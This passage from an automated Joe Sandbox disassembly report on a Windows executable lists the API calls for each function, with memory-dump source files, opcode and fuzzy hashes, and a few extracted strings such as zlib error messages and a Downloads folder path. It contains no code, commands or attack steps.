                                                                • Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6
                                                                • Part of subcall function 00000001400120D0: HeapReAlloc.KERNEL32 ref: 0000000140012151
                                                                • Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194
                                                                • Part of subcall function 000000014000C4D0: RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C8A5
                                                                • Part of subcall function 000000014000C4D0: AddVectoredExceptionHandler.KERNEL32 ref: 000000014000C8C0
                                                                • Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
                                                                • Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
                                                                • Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1
                                                                • Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
                                                                • Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266
                                                              • HeapDestroy.KERNEL32 ref: 000000014000124C
                                                              • ExitProcess.KERNEL32 ref: 0000000140001258
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$Alloc$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$CommonControlsDestroyExitInitInitializeProcessRemove
                                                              • String ID:
                                                              • API String ID: 1207063833-0
                                                              • Opcode ID: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
                                                              • Instruction ID: 5ef5c56730dbad915fac233b77092dd37bc53bc4ec3343fa221c1b372e2f6746
                                                              • Opcode Fuzzy Hash: 06dbeff3fd86c6695b84df31992dbf02651ab7d441abcdbe23a8bedf592c97f1
                                                              • Instruction Fuzzy Hash: 9D510AF0A11A4081FA03F7A3F8527E926559B9D7D0F808119BF1D1B3F3DD3A86598B22

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00000001400123E0: TlsGetValue.KERNEL32 ref: 00000001400123F8
                                                              • RemoveDirectoryW.KERNEL32(00000000,?,0000000140003010), ref: 000000014000299C
                                                              • RemoveDirectoryW.KERNEL32(?,0000000140003010), ref: 00000001400029A8
                                                                • Part of subcall function 0000000140007170: WaitForSingleObject.KERNEL32 ref: 0000000140007187
                                                                • Part of subcall function 000000014000720C: TerminateThread.KERNEL32 ref: 0000000140007223
                                                                • Part of subcall function 000000014000720C: EnterCriticalSection.KERNEL32 ref: 0000000140007230
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: DirectoryRemove$CriticalEnterObjectSectionSingleTerminateThreadValueWait
                                                              • String ID:
                                                              • API String ID: 547990026-0
                                                              • Opcode ID: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                              • Instruction ID: 7a41e47de86a43ff34abb2becfbad555fd020f9bfb046cc2ed969e3c0c855493
                                                              • Opcode Fuzzy Hash: de809ab9685b3f463e7d0b476c7a816dcb7d80807795b0b8c6412b9b34da734e
                                                              • Instruction Fuzzy Hash: 0F01FFF5509B01E5F923BB63BC02BDA6B61E74E3E0F409405BB89131B3DE3DD9849610

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ExceptionHandlerVectored$Remove
                                                              • String ID:
                                                              • API String ID: 3670940754-0
                                                              • Opcode ID: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                                              • Instruction ID: 54ed52b0d94e107c171475cce83a86a7777a808cb3853d4771323e3d57a36066
                                                              • Opcode Fuzzy Hash: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                                              • Instruction Fuzzy Hash: 8AF0ED7061370485FE5BDB93B8987F472A0AB4C7C0F184029BB49076719F3C88A48348

                                                               Control-flow Graph

                                                               • Basic blocks (node: address range, APIs called) and edges, recovered from the rendered graph; the executed / not-executed colouring of the image is not preserved in text:
                                                               • 674: 14000da6c-14000da80 -> 676, 677
                                                               • 676: 14000da82-14000da85 -> 679, 680
                                                               • 677: 14000da9f -> 678
                                                               • 678: 14000daa1-14000daa6 (no successors)
                                                               • 679: 14000da92-14000da9d, DeleteFileW -> 678
                                                               • 680: 14000da87-14000da8c, SetFileAttributesW -> 679
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesDelete
                                                              • String ID:
                                                              • API String ID: 2910425767-0
                                                              • Opcode ID: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                                              • Instruction ID: adf2a79140fabccb03c20fd21f07aa3af446659453137af282c5310bbe8ffc9f
                                                              • Opcode Fuzzy Hash: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                                              • Instruction Fuzzy Hash: 48E05BB471910195FB6BD7A778153F521419F8D7D1F184121AB42071B0EF3D44C55222
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                               • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                               • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap$CreateValue
                                                              • String ID:
                                                              • API String ID: 493873155-0
                                                              • Opcode ID: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
                                                              • Instruction ID: 66307e28580f649ba8418ae6b9c958ace7f1b69875393c61862d084d03b91818
                                                              • Opcode Fuzzy Hash: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
                                                              • Instruction Fuzzy Hash: 9ED0C939A1175092EB46AB72AC5A3E922A0F75C3C1F901819B70907775DF7E81956A00
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: DestroyFreeHeap
                                                              • String ID:
                                                              • API String ID: 3293292866-0
                                                              APIs
                                                              Similarity
                                                              • API ID: Heap$AllocFreememset
                                                              • String ID:
                                                              • API String ID: 3063399779-0
                                                              APIs
                                                              Similarity
                                                              • API ID: AllocHeapValue
                                                              • String ID:
                                                              • API String ID: 2362848668-0
                                                              APIs
                                                              Similarity
                                                              • API ID: CloseFreeHandleHeap
                                                              • String ID:
                                                              • API String ID: 1642312469-0
                                                              APIs
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              APIs
                                                              Similarity
                                                              • API ID: Free
                                                              • String ID:
                                                              • API String ID: 3978063606-0
                                                              APIs
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              APIs
                                                              Similarity
                                                              • API ID: ExceptionHandlerRemoveVectored
                                                              • String ID:
                                                              • API String ID: 1340492425-0
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
                                                              • String ID: BUTTON$C$EDIT$P$STATIC$n
                                                              • API String ID: 9748049-1690119102
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $header crc mismatch$unknown compression method$unknown header flags set
                                                              • API String ID: 0-4074041902
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
                                                              • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                              • API String ID: 217932011-4219398408
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                                                              • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                                              • API String ID: 1740785346-287042676
                                                              APIs
                                                              Similarity
                                                              • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 298514914-0
                                                              APIs
                                                              Similarity
                                                              • API ID: _wcsdupfreewcsncpy$Value
                                                              • String ID:
                                                              • API String ID: 1554701960-0
                                                              APIs
                                                              Similarity
                                                              • API ID: Window$ClassDestroyEnableProcUnregister
                                                              • String ID:
                                                              • API String ID: 1570244450-0
                                                              • Opcode ID: 91bde67e80f91e2742b9164cbcf556c590c39b782bd753c692008bc4014d2561
                                                              • Instruction ID: 9942cbda7600913111d3f6e009e2264a98590d225334710fbbc2bdadcd09b10d
                                                              • Opcode Fuzzy Hash: 91bde67e80f91e2742b9164cbcf556c590c39b782bd753c692008bc4014d2561
                                                              • Instruction Fuzzy Hash: F121F9B4204A5182FB56DB27F8483A923A1E78CBC1F549126FB4A4B7B5DF3DC8459700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                                              • String ID:
                                                              • API String ID: 3383493704-0
                                                              • Opcode ID: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                                              • Instruction ID: 80f857dfb6a9a2f530fca3cb10c8fb692f8ca5f83b5b0ec86a1534c3d91aadad
                                                              • Opcode Fuzzy Hash: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                                              • Instruction Fuzzy Hash: 9D11397020064182EB46AB27A9483B962A1EB8CBC4F448024FA0A4B6B5DF7DC5458301
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProcSleep
                                                              • String ID: InitOnceExecuteOnce$Kernel32.dll
                                                              • API String ID: 938261879-1339284965
                                                              • Opcode ID: 9cc1215efa9171b7dae7fadfb2c47d350fa49a6ad5bcb444afd81da3a54d843a
                                                              • Instruction ID: 258e5301f75bcfa7e340e12184f2e3f20ed82b399a9dd39da3854f47a4428b06
                                                              • Opcode Fuzzy Hash: 9cc1215efa9171b7dae7fadfb2c47d350fa49a6ad5bcb444afd81da3a54d843a
                                                              • Instruction Fuzzy Hash: AB118F3120974585EB5ADF57E8843E973A0FB8CBD0F488029AB0A0B666EF3AC595C340
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$CurrentThread$EnableEnumWindows
                                                              • String ID:
                                                              • API String ID: 2527101397-0
                                                              • Opcode ID: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                                              • Instruction ID: 08829170a8ee5f1b49cfdf050f6537c1ef42b3a6330418e8cb94bb4851fba9f1
                                                              • Opcode Fuzzy Hash: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                                              • Instruction Fuzzy Hash: 6D3171B261064182FB62CF22F5487A977A1F75CBE9F484215FB6947AF9CB79C844CB00
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocValue$Heap
                                                              • String ID:
                                                              • API String ID: 2472784365-0
                                                              • Opcode ID: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                                              • Instruction ID: 773301f083ee798336704ec3d5312664b9b868eef9dc2a5d6ba13fea1fa7b4fd
                                                              • Opcode Fuzzy Hash: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                                              • Instruction Fuzzy Hash: 3821F434200B8096EB4A9B92F8843E963A5F7DCBD0F548429FB4D47B79DE3DC8858740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 458812214-0
                                                              • Opcode ID: 6a38117e792cc01899f22305820c9a0c290a6e73bcc29c544877765eca75b33b
                                                              • Instruction ID: 6ed0f769cbd5916c92599595d34faf5ec2fc13e913d525d246d608b89e2aac48
                                                              • Opcode Fuzzy Hash: 6a38117e792cc01899f22305820c9a0c290a6e73bcc29c544877765eca75b33b
                                                              • Instruction Fuzzy Hash: FD210076204B0081EB06DB22E8943E973A4FB8CBC4F988026EB4D47779DF39C946C340
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                              • String ID:
                                                              • API String ID: 3171405041-0
                                                              • Opcode ID: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                                              • Instruction ID: 030e86aa03d9d600b90796447865b7023312810cb66964dcc71f9bcfbca43c2c
                                                              • Opcode Fuzzy Hash: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                                              • Instruction Fuzzy Hash: 4721E735201B4485EB4ADB57E5903E823A4F78CBC4F444115AB5E0B7B6CF3AC4A5C340
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$AllocHeap$EnterInitializeLeave
                                                              • String ID:
                                                              • API String ID: 2544007295-0
                                                              • Opcode ID: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                                              • Instruction ID: 3c708bd0e8d6be70d523372ffb5b6a2e3cd9d0d7dbc1ea7b56162c86fa93b61b
                                                              • Opcode Fuzzy Hash: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                                              • Instruction Fuzzy Hash: 5E413932605B8086EB5ADF56E4403E877A4F79CBD0F54812AEB4D4BBA5DF39C8A5C700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: memset$memmove
                                                              • String ID:
                                                              • API String ID: 3527438329-0
                                                              • Opcode ID: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
                                                              • Instruction ID: dba297aa8fb042b18ff0822facc25e4acf5e394d44c3b4579297ae20e1131b5c
                                                              • Opcode Fuzzy Hash: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
                                                              • Instruction Fuzzy Hash: E231007271064081FB16DA2BE4507E96612E38DBD0F848126EB1A83BAACA7EC502C740
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $header crc mismatch
                                                              • API String ID: 0-4092041874
                                                              • Opcode ID: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
                                                              • Instruction ID: f6894c87bdfd3a48e6411c52319aba3e102a5ca19e93322268f312efd41433f4
                                                              • Opcode Fuzzy Hash: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
                                                              • Instruction Fuzzy Hash: 41A18FB26003508BFB269E1AC48C7AE3BE6F7587C8F064558EB964B3A4D776C954C780
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heapwcsncpy$AllocFree
                                                              • String ID:
                                                              • API String ID: 1479455602-0
                                                              • Opcode ID: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
                                                              • Instruction ID: 28fd82db213d89e843f0df720333d3fbeca218ccf85cb71e10007619eb34b75b
                                                              • Opcode Fuzzy Hash: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
                                                              • Instruction Fuzzy Hash: BF51A0B2B0068486EA66DF26A404BEA67E1F789BD4F588125EF4D477E5EB3CC542C300
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: memmove
                                                              • String ID: $ $invalid stored block lengths
                                                              • API String ID: 2162964266-1718185709
                                                              • Opcode ID: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
                                                              • Instruction ID: 754f218cd566fbce8dd602483dcb0b6cf2df6dd41c0e80f26ad42ee7a9f80f3a
                                                              • Opcode Fuzzy Hash: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
                                                              • Instruction Fuzzy Hash: 3A417B766006508BE7268F27D5887AE3BA0F3087C8F155119FF8A4BBA4C776D8A1CB40
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: EntryFunctionLookup$UnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3286588846-0
                                                              • Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                              • Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
                                                              • Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                              • Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CharLower
                                                              • String ID:
                                                              • API String ID: 1615517891-0
                                                              • Opcode ID: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                              • Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
                                                              • Opcode Fuzzy Hash: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                              • Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmp
